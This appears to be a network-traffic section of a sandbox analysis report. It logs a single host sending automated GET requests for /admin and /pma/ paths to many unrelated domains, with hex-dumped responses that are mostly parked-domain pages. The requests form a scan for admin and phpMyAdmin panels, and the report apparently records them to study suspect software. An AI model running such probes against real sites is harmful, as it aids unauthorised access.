Nov 30, 2023 11:22:43.001506090 CET	440	IN	HTTP/1.1 301 Moved Permanently Server: nginx/1.18.0 (Ubuntu) Date: Thu, 30 Nov 2023 10:22:42 GMT Content-Type: text/html Content-Length: 178 Connection: keep-alive Location: https://gco.uk/admin.php Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
173	192.168.2.4	63751	64.190.63.111	80

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:22:42.820444107 CET	217	OUT	GET /admin HTTP/1.1 Host: apee.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Nov 30, 2023 11:22:43.011662960 CET	142	IN	HTTP/1.1 439 date: Thu, 30 Nov 2023 10:22:42 GMT content-length: 0 server: NginX

Session ID	Source IP	Source Port	Destination IP	Destination Port
174	192.168.2.4	64748	104.247.82.52	80

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:22:42.924204111 CET	213	OUT	GET /pma/ HTTP/1.1 Host: cm.cz Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Nov 30, 2023 11:22:43.080813885 CET	1340	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 30 Nov 2023 10:22:43 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBALquDFETXRn0Hr05fUP7EJT77xYnPmRbpMy4vk8KYiHnkNpednjOANJcaXDXcKQJN0nXKZJL7TciJD8AoHXK158CAwEAAQ==_dpSF6vqQwO/peByyqrixBG6nzT30sWsTZxa5pKOtpENKSDooTRBAw4BxduGP4IVarewD0lGC/fLNbyMpWFf0Iw== Accept-CH: viewport-width Accept-CH: dpr Accept-CH: device-memory Accept-CH: rtt Accept-CH: downlink Accept-CH: ect Accept-CH: ua Accept-CH: ua-full-version Accept-CH: ua-platform Accept-CH: ua-platform-version Accept-CH: ua-arch Accept-CH: ua-model Accept-CH: ua-mobile Accept-CH-Lifetime: 30 X-Domain: cm.cz X-Subdomain: Content-Encoding: gzip Data Raw: 37 63 39 0d 0a 1f 8b 08 00 00 00 00 00 04 03 e5 5b 7b 77 da b8 b6 ff bb f9 14 2e 5d 27 90 3b bc c9 93 c4 e9 25 25 69 92 16 f2 a2 8f a4 ab b7 cb d8 02 4c 8c cd d8 26 40 7a fa 01 ee e7 3a 5f ec fc b6 24 db 32 90 76 3a 67 a6 6b dd 75 99 69 c0 d2 96 f6 7b 6b 6b 4b 3e 78 de bc 78 d5 b9 bd 3c d6 06 e1 c8 39 5c 3b a0 2f cd 32 42 a3 60 58 5d c7 33 ef ef d9 5c cf b4 4e a6 d3 e6 d5 ed f9 1b ef ee 6c f0 60 b6 1b 57 c7 47 47 57 8d e6 cd b4 31 bd 69 9c 1f 35 de fe 3e 69 9e 1c 77 3e 5e bb e5 53 bf bc d5 7b 77 b9 73 7c de d9 d9 99 dd ba 97 a3 eb ee b8 35 df 7c b8 df 7d 73 6b 9f ba f7 ed 31 b3 dc e1 45 a3 7d 6e 1a 1f 9b 1f cd 37 57 e7 ed b2 fb f1 cd dd f9 db 9d 8e 69 9f 37 77 1b de e9 c7 37 95 ad dd 57 8d e9 71 a3 71 a5 eb 5f ac f1 cd c9 f6 c3 ef 57 d3 8b d2 98 1d cd e7 bf fb f6 ec e8 f5 b6 fb d8 a9 95 83 0f 41 e7 6e 66 6c 8d df 5c 84 e3 e3 f6 9b 9b a6 e7 75 ae 8f 1a d3 cd a3 99 35 79 7d b9 79 f6 de f0 d9 b4 59 76 5e bf 2a f5 de b6 bb f3 d6 f8 c3 49 af 7c 36 d5 f5 8c 36 1b 39 6e a0 67 06 61 38 ae 97 4a d3 e9 b4 38 ad 15 3d bf 5f aa ec ed ed 95 66 24 0f 0e 54 77 0c b7 af 67 98 9b d1 e2 5f 24 2f 66 58 87 6b 1a 3e 07 23 16 1a 10 63 38 2e b0 df 27 f6 83 9e 79 e5 b9 21 73 c3 42 67 3e 66 19 cd 14 4f 7a 26 64 b3 b0 44 f3 ee 6b e6 c0 f0 03 16 ea 93 b0 57 d8 cd 94 d4 89 5c 63 c4 f4 cc 83 cd a6 63 cf 0f 95 e1 53 db 0a 07 ba c5 1e 6c 93 15 f8 43 5e b3 5d 3b b4 0d a7 10 98 86 c3 f4 4a 5e 0b 06 be ed de 17 42 af d0 b3 43 dd f5 e2 b9 43 3b 74 d8 a1 39 2a 9a 8f 07 25 f1 20 a8 0f 4c df 1e 87 5a e0 9b 7a 46 c8 a1 Data Ascii: 7c9[{w.]';%%iL&@z:_$2v:gkui{kkK>xx<9\;/2B`X]3\Nl`WGGW1i5>iw>^S{ws\|5\|}sk1E}n7Wi7w7Wqq_WAnfl\u5y}yYv^I\|669nga8J8=_f$Twg_$/fXk>#c8.'y!sBg>fOz&dDkW\ccSlC^];J^BCC;t9% LZzF
Nov 30, 2023 11:22:43.080852032 CET	1340	IN	Data Raw: ef 79 7d 87 15 4d 6f 54 32 ac 80 b9 01 2b 59 de c8 b0 dd a0 64 1a bd e2 30 78 69 74 c7 7a 25 73 78 50 12 83 0f b9 18 82 70 ee 30 6d c4 2c db d0 33 e8 60 10 d9 e1 5a d1 08 c0 e8 97 20 34 fc b2 f6 75 ed 59 d7 30 ef fb be 37 71 ad ba 36 f1 9d 5c b6 Data Ascii: y}MoT2+Yd0xitz%sxPp0m,3`Z 4uY07q6\TjwNa6)7z>VtYXl&(y}\13BUjB<Vec!5vY5_Dd$/"'2Ccl_I$9fi@~=+3
Nov 30, 2023 11:22:43.080888987 CET	266	IN	Data Raw: d1 b0 e1 eb 63 87 9b f9 d2 c5 b6 f9 1e 46 f5 ec d9 b3 e6 45 eb 5f ff db 6e 68 f8 ff f2 fa a2 79 7c be f6 ec a0 64 60 37 5d 82 1d ca 4d f0 b2 45 56 a5 45 12 7d 2b 0c b6 a6 74 2f 82 88 44 2b a3 11 f7 82 46 22 51 19 70 30 a8 44 9b 62 fc e2 1a 53 88 Data Ascii: cFE_nhy\|d`7]MEVE}+t/D+F"Qp0DbS%-$)0B9yM3Vpsc\i;XQ]V+Rf!uh<"<s3rlqjEo\`"-y-+csj^
Nov 30, 2023 11:22:43.080925941 CET	1340	IN	Data Raw: 65 64 34 0d 0a f3 c2 69 f5 5a ad 9c a7 e5 46 af c2 30 11 72 f9 f7 88 b9 93 ae e1 a3 24 91 c7 1e 3e 9c 04 fa 9c 05 e8 f5 1c d1 9a dd 40 6a 62 4e 82 dc 46 6c 9c 69 54 92 fb 4b 41 8f 76 c9 f1 c3 72 c8 7c 14 1e 93 9f 24 48 29 57 f9 85 90 26 8a 1d 21 Data Ascii: ed4iZF0r$>@jbNFliTKAvr\|$H)W&!3Bw&F]h_MgtK%UiB=g X,A>srFQ\/3@&qDq/h=-vKuT9U RL"FvwBgl&S *vRF
Nov 30, 2023 11:22:43.080961943 CET	1340	IN	Data Raw: 94 74 90 f9 49 03 a1 1a 0f 5f 3a f0 c7 ee 69 b9 e7 f1 78 b5 87 20 42 3f 2a 8e 47 f0 f4 4d b6 cd 70 a6 a6 63 ef 6f 72 6b 2c 62 4b 75 ec e0 40 0c 55 d3 f9 99 95 d0 b7 a1 f4 04 47 f3 8e d1 a7 15 2a 97 b5 7b 3e be b3 1b 9f ca 9f 45 d2 b1 38 3f 70 90 Data Ascii: tI_:ix B?GMpcork,bKu@UG{>E8?p!\H,"y}1tUt)+F?'>Mu-,f'RipfQ@u"ErOrXr+!V-'CsuN8q5I<7sdcUhp:[ ,%`
Nov 30, 2023 11:22:43.081000090 CET	1290	IN	Data Raw: 34 1d 99 85 28 ae 52 8a 99 c5 99 e9 46 34 09 5f f5 84 22 12 36 54 ed 89 3e 9a e1 b9 04 88 c7 12 2e 3a 30 eb 61 8b 9a 23 74 a9 79 c4 29 7d e6 f5 71 27 93 a7 eb f4 79 51 1e 95 40 69 1e 70 eb da b5 72 64 13 e8 86 ad a7 d8 49 a1 90 65 cb 3f c6 11 41 Data Ascii: 4(RF4_"6T>.:0a#ty)}q'yQ@iprdIe?AsLa%Ei]',75'#\ %qem@UJ Y\[ .1<<"{>9^"st^l&Jb1hj!MDB!GW6<.1-

Session ID	Source IP	Source Port	Destination IP	Destination Port
175	192.168.2.4	65012	13.248.169.48	80

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:22:42.961548090 CET	220	OUT	GET /admin HTTP/1.1 Host: ct.ated.net Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Nov 30, 2023 11:22:43.061444998 CET	1340	IN	HTTP/1.1 200 OK Server: openresty Date: Thu, 30 Nov 2023 10:22:43 GMT Content-Type: text/html Content-Length: 12477 Last-Modified: Mon, 13 Nov 2023 23:32:46 GMT Connection: keep-alive ETag: "6552b21e-30bd" X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_QdeOayg28I0G9mcSttBwOLJ2rd5B9u8+sDKCztZcc1MO56Pug5amBnlBvCZh6PMi5mvt/NWRxkGAQ2tb488n5Q Cache-Control: no-cache X-Content-Type-Options: nosniff Set-Cookie: caf_ipaddr=10.116.88.132;Path=/;Max-Age=86400; Set-Cookie: country=;Path=/;Max-Age=86400; Set-Cookie: city="";Path=/;Max-Age=86400; Set-Cookie: expiry_partner=;Path=/;Max-Age=86400; Accept-Ranges: bytes Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 2f 3e 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 3c 6e 6f 73 63 72 69 70 74 3e 3c 73 74 79 6c 65 3e 23 63 6f 6e 74 65 6e 74 2d 6d 61 69 6e 20 7b 0a 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 20 20 20 20 7d 3c 2f 73 74 79 6c 65 3e 3c 64 69 76 3e 46 6f 72 20 66 75 6c 6c 20 66 75 6e 63 74 69 6f 6e 61 6c 69 74 79 20 6f 66 20 74 68 69 73 20 73 69 74 65 20 69 74 20 69 73 20 6e 65 63 65 73 73 61 72 79 20 74 6f 20 65 6e 61 62 6c 65 20 4a 61 76 61 53 63 72 69 70 74 2e 20 48 65 72 65 20 61 72 65 20 74 68 65 20 3c 61 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 20 72 65 6c 3d 22 6e 6f 6f 70 65 6e 65 72 20 6e 6f 72 65 66 65 72 72 65 72 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 65 6e 61 62 6c 65 2d 6a 61 76 61 73 63 72 69 70 74 2e 63 6f 6d 2f 22 3e 69 6e 73 74 72 75 63 74 69 6f 6e 73 20 68 6f 77 20 74 6f 20 65 6e 61 62 6c 65 20 4a 61 76 61 53 63 72 69 70 74 20 69 6e 20 79 6f 75 72 20 77 Data Ascii: <!doctype html><html lang="en"><head><meta http-equiv="content-type" content="text/html;charset=utf-8"/><meta name="viewport" content="width=device-width,initial-scale=1"/><link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"/><title></title><noscript><style>#content-main { display: none; }</style><div>For full functionality of this site it is necessary to enable JavaScript. Here are the <a target="_blank" rel="noopener noreferrer" href="https://www.enable-javascript.com/">instructions how to enable JavaScript in your w
Nov 30, 2023 11:22:43.061480999 CET	1340	IN	Data Raw: 65 62 20 62 72 6f 77 73 65 72 3c 2f 61 3e 2e 3c 2f 64 69 76 3e 3c 2f 6e 6f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 3e 76 61 72 20 61 62 70 20 3d 20 75 6e 64 65 66 69 6e 65 64 3b 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 22 Data Ascii: eb browser</a>.</div></noscript><script>var abp = undefined;</script><script src="/px.js?ch=1&abp=1"></script><script src="/px.js?ch=2&abp=1"></script><script>!function(){"use strict";var e={49040:function(e,t,n){function r(e){return!0===e\|\|"t
Nov 30, 2023 11:22:43.061515093 CET	338	IN	Data Raw: 65 2e 6c 6f 67 4d 65 73 73 61 67 65 28 65 2e 4c 65 76 65 6c 2e 45 52 52 4f 52 2c 74 29 7d 7d 2c 7b 6b 65 79 3a 22 77 61 72 6e 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 65 2e 6c 6f 67 4d 65 73 73 61 67 65 28 Data Ascii: e.logMessage(e.Level.ERROR,t)}},{key:"warn",value:function(t){return e.logMessage(e.Level.WARN,t)}},{key:"info",value:function(t){return e.logMessage(e.Level.INFO,t)}},{key:"debug",value:function(t){return e.logMessage(e.Level.DEBUG,t)}},{key:
Nov 30, 2023 11:22:43.061552048 CET	1340	IN	Data Raw: 73 61 67 65 28 65 2e 4c 65 76 65 6c 2e 54 52 41 43 45 2c 74 29 7d 7d 5d 29 2c 65 7d 28 29 3b 66 75 6e 63 74 69 6f 6e 20 69 28 65 29 7b 69 66 28 22 6f 62 6a 65 63 74 22 3d 3d 3d 74 79 70 65 6f 66 20 65 29 74 72 79 7b 72 65 74 75 72 6e 20 4a 53 4f Data Ascii: sage(e.Level.TRACE,t)}}]),e}();function i(e){if("object"===typeof e)try{return JSON.stringify(e)}catch(t){return a.error(t),e}return Array.isArray(e)?e.toString():e}a.Level={NONE:"NONE",ERROR:"ERROR",WARN:"WARN",INFO:"INFO",DEBUG:"DEBUG",TRACE
Nov 30, 2023 11:22:43.061600924 CET	1340	IN	Data Raw: 54 4e 45 52 5f 53 4e 3a 22 6e 61 6d 65 61 64 6d 69 6e 5f 70 61 72 6b 5f 64 6d 5f 32 39 30 33 5f 61 66 74 65 72 6e 69 63 22 2c 52 45 41 43 54 5f 41 50 50 5f 56 45 52 49 5a 4f 4e 5f 46 45 45 44 5f 50 41 52 54 4e 45 52 5f 43 50 3a 22 6e 61 6d 65 61 Data Ascii: TNER_SN:"nameadmin_park_dm_2903_afternic",REACT_APP_VERIZON_FEED_PARTNER_CP:"nameadmin_park_dm_2903_godaddy",REACT_APP_VERIZON_FEED_ENABLE:"true",REACT_APP_VERIZON_FEED_PROXY:"https://api.aws.parking.godaddy.com",REACT_APP_FORWARDER_LANDER_URL
Nov 30, 2023 11:22:43.061633110 CET	338	IN	Data Raw: 74 6d 5f 6d 65 64 69 75 6d 3d 42 49 4e 4e 53 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 54 44 46 53 5f 42 49 4e 4e 53 26 74 72 61 66 66 69 63 5f 74 79 70 65 3d 54 44 46 53 5f 42 49 4e 4e 53 26 74 72 61 66 66 69 63 5f 69 64 3d 62 69 6e 6e 73 26 7b Data Ascii: tm_medium=BINNS&utm_campaign=TDFS_BINNS&traffic_type=TDFS_BINNS&traffic_id=binns&{QUERY}",TDFS_AFTERNIC:"https://www.afternic.com/forsale/{DOMAIN}?utm_source=TDFS_DASLNC&utm_medium=DASLNC&utm_campaign=TDFS_DASLNC&traffic_type=TDFS_DASLNC&traff
Nov 30, 2023 11:22:43.061669111 CET	1340	IN	Data Raw: 50 49 3a 22 68 74 74 70 73 3a 2f 2f 61 70 69 2e 61 66 74 65 72 6e 69 63 2e 63 6f 6d 22 2c 4e 4f 52 4d 41 4c 5f 44 4f 4d 41 49 4e 5f 4c 45 4e 47 54 48 5f 4c 49 4d 49 54 3a 32 30 7d 7d 2c 31 35 36 37 31 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e Data Ascii: PI:"https://api.afternic.com",NORMAL_DOMAIN_LENGTH_LIMIT:20}},15671:function(e,t,n){function r(e,t){if(!(e instanceof t))throw new TypeError("Cannot call a class as a function")}n.d(t,{Z:function(){return r}})},43144:function(e,t,n){n.d(t,{Z:f
Nov 30, 2023 11:22:43.061721087 CET	1340	IN	Data Raw: 72 20 6f 3d 74 5b 72 5d 3b 69 66 28 76 6f 69 64 20 30 21 3d 3d 6f 29 72 65 74 75 72 6e 20 6f 2e 65 78 70 6f 72 74 73 3b 76 61 72 20 61 3d 74 5b 72 5d 3d 7b 65 78 70 6f 72 74 73 3a 7b 7d 7d 3b 72 65 74 75 72 6e 20 65 5b 72 5d 2e 63 61 6c 6c 28 61 Data Ascii: r o=t[r];if(void 0!==o)return o.exports;var a=t[r]={exports:{}};return e[r].call(a.exports,a,a.exports,n),a.exports}n.m=e,n.n=function(e){var t=e&&e.__esModule?function(){return e.default}:function(){return e};return n.d(t,{a:t}),t},n.d=functi
Nov 30, 2023 11:22:43.061758041 CET	1340	IN	Data Raw: 6f 6e 28 74 2c 6e 29 7b 75 2e 6f 6e 65 72 72 6f 72 3d 75 2e 6f 6e 6c 6f 61 64 3d 6e 75 6c 6c 2c 63 6c 65 61 72 54 69 6d 65 6f 75 74 28 6c 29 3b 76 61 72 20 6f 3d 65 5b 72 5d 3b 69 66 28 64 65 6c 65 74 65 20 65 5b 72 5d 2c 75 2e 70 61 72 65 6e 74 Data Ascii: on(t,n){u.onerror=u.onload=null,clearTimeout(l);var o=e[r];if(delete e[r],u.parentNode&&u.parentNode.removeChild(u),o&&o.forEach((function(e){return e(n)})),t)return t(n)},l=setTimeout(s.bind(null,void 0,{type:"timeout",target:u}),12e4);u.oner
Nov 30, 2023 11:22:43.061794996 CET	1340	IN	Data Raw: 65 66 7c 7c 74 2c 63 3d 6e 65 77 20 45 72 72 6f 72 28 22 4c 6f 61 64 69 6e 67 20 43 53 53 20 63 68 75 6e 6b 20 22 2b 65 2b 22 20 66 61 69 6c 65 64 2e 5c 6e 28 22 2b 75 2b 22 29 22 29 3b 63 2e 63 6f 64 65 3d 22 43 53 53 5f 43 48 55 4e 4b 5f 4c 4f Data Ascii: ef\|\|t,c=new Error("Loading CSS chunk "+e+" failed.\n("+u+")");c.code="CSS_CHUNK_LOAD_FAILED",c.type=i,c.request=u,a.parentNode&&a.parentNode.removeChild(a),o(c)}},a.href=t,n?n.parentNode.insertBefore(a,n.nextSibling):document.head.appendChild(
Nov 30, 2023 11:22:43.061829090 CET	622	IN	Data Raw: 22 2c 54 44 46 53 5f 41 46 54 45 52 4e 49 43 3a 22 54 44 46 53 5f 41 46 54 45 52 4e 49 43 22 2c 50 41 52 4b 49 4e 47 3a 22 50 41 52 4b 49 4e 47 22 7d 2c 72 3d 7b 44 4f 4d 41 49 4e 3a 22 64 6f 6d 61 69 6e 22 7d 2c 6f 3d 7b 46 4f 52 57 41 52 44 45 Data Ascii: ",TDFS_AFTERNIC:"TDFS_AFTERNIC",PARKING:"PARKING"},r={DOMAIN:"domain"},o={FORWARDER:"FORWARDER",ERROR:"ERROR"},a={ERROR_INVALID_STATUS_CODE:"ERROR_INVALID_STATUS_CODE",ERROR_API_ERROR:"ERROR_API_ERROR",ERROR_TIMEOUT:"ERROR_TIMEOUT",ERROR_CLIEN

Session ID	Source IP	Source Port	Destination IP	Destination Port
176	192.168.2.4	64999	15.197.142.173	80

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:22:42.961579084 CET	216	OUT	GET /admin HTTP/1.1 Host: a6a.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Nov 30, 2023 11:22:43.064237118 CET	419	IN	HTTP/1.1 404 Not Found Date: Thu, 30 Nov 2023 10:22:43 GMT Content-Type: text/html; charset=utf-8 Content-Length: 125 Connection: keep-alive Server: ip-10-123-122-167.ec2.internal X-Request-Id: e833e0d5-1606-4105-ae9c-d86ac7e7f18e Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 27 65 6e 2d 75 73 27 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 2a 2a 20 4e 6f 74 20 46 6f 75 6e 64 20 2a 2a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 48 54 54 50 20 53 74 61 74 75 73 3a 20 34 30 34 20 28 6e 6f 74 20 66 6f 75 6e 64 29 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML><html lang='en-us'><head><title> Not Found </title></head><body>HTTP Status: 404 (not found)</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
177	192.168.2.4	65008	199.59.243.225	80

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:22:42.961654902 CET	215	OUT	GET /admin/ HTTP/1.1 Host: ia.eu Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Nov 30, 2023 11:22:43.061372042 CET	1254	IN	HTTP/1.1 200 OK date: Thu, 30 Nov 2023 10:22:42 GMT content-type: text/html; charset=utf-8 content-length: 1001 x-request-id: 1853625b-9d39-49c3-9863-3432d0030824 cache-control: no-store, max-age=0 accept-ch: sec-ch-prefers-color-scheme critical-ch: sec-ch-prefers-color-scheme vary: sec-ch-prefers-color-scheme x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_LdcpY9GdAlhzzmVtW5lWfSSgMWm5OFoENxvO2zjkMKTeTPS4vZHWzRzCxQdGFt66XulzAjGXZN5+pOel35e/1w== set-cookie: parking_session=1853625b-9d39-49c3-9863-3432d0030824; expires=Thu, 30 Nov 2023 10:37:43 GMT; path=/ Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 4c 64 63 70 59 39 47 64 41 6c 68 7a 7a 6d 56 74 57 35 6c 57 66 53 53 67 4d 57 6d 35 4f 46 6f 45 4e 78 76 4f 32 7a 6a 6b 4d 4b 54 65 54 50 53 34 76 5a 48 57 7a 52 7a 43 78 51 64 47 46 74 36 36 58 75 6c 7a 41 6a 47 58 5a 4e 35 2b 70 4f 65 6c 33 35 65 2f 31 77 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 70 6e 67 3b 62 61 73 65 36 34 2c 69 56 42 4f 52 77 30 4b 47 67 6f 41 41 41 41 4e 53 55 68 45 55 67 41 41 41 41 45 41 41 41 41 42 43 41 49 41 41 41 43 51 64 31 50 65 41 41 41 41 44 45 6c 45 51 56 51 49 31 32 50 34 2f 2f 38 2f 41 41 58 2b 41 76 37 63 7a 46 6e 6e 41 41 41 41 41 45 6c 46 54 6b 53 75 51 6d 43 43 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_LdcpY9GdAlhzzmVtW5lWfSSgMWm5OFoENxvO2zjkMKTeTPS4vZHWzRzCxQdGFt66XulzAjGXZN5+pOel35e/1w==" lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"> <link
Nov 30, 2023 11:22:43.061408043 CET	525	IN	Data Raw: 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 Data Ascii: rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiMTg1MzYyNWItOWQzOS00OWMzLTk4NjMtMzQzMmQwMDMwODI0IiwicGFnZV90aW1lIjoxNzAxMzM5NzYzLCJwYWdlX3
Nov 30, 2023 11:22:43.076383114 CET	525	IN	Data Raw: 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 Data Ascii: rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiMTg1MzYyNWItOWQzOS00OWMzLTk4NjMtMzQzMmQwMDMwODI0IiwicGFnZV90aW1lIjoxNzAxMzM5NzYzLCJwYWdlX3

Session ID	Source IP	Source Port	Destination IP	Destination Port
178	192.168.2.4	64998	15.197.142.173	80

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:22:42.961678028 CET	217	OUT	GET /admin/ HTTP/1.1 Host: m7l.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
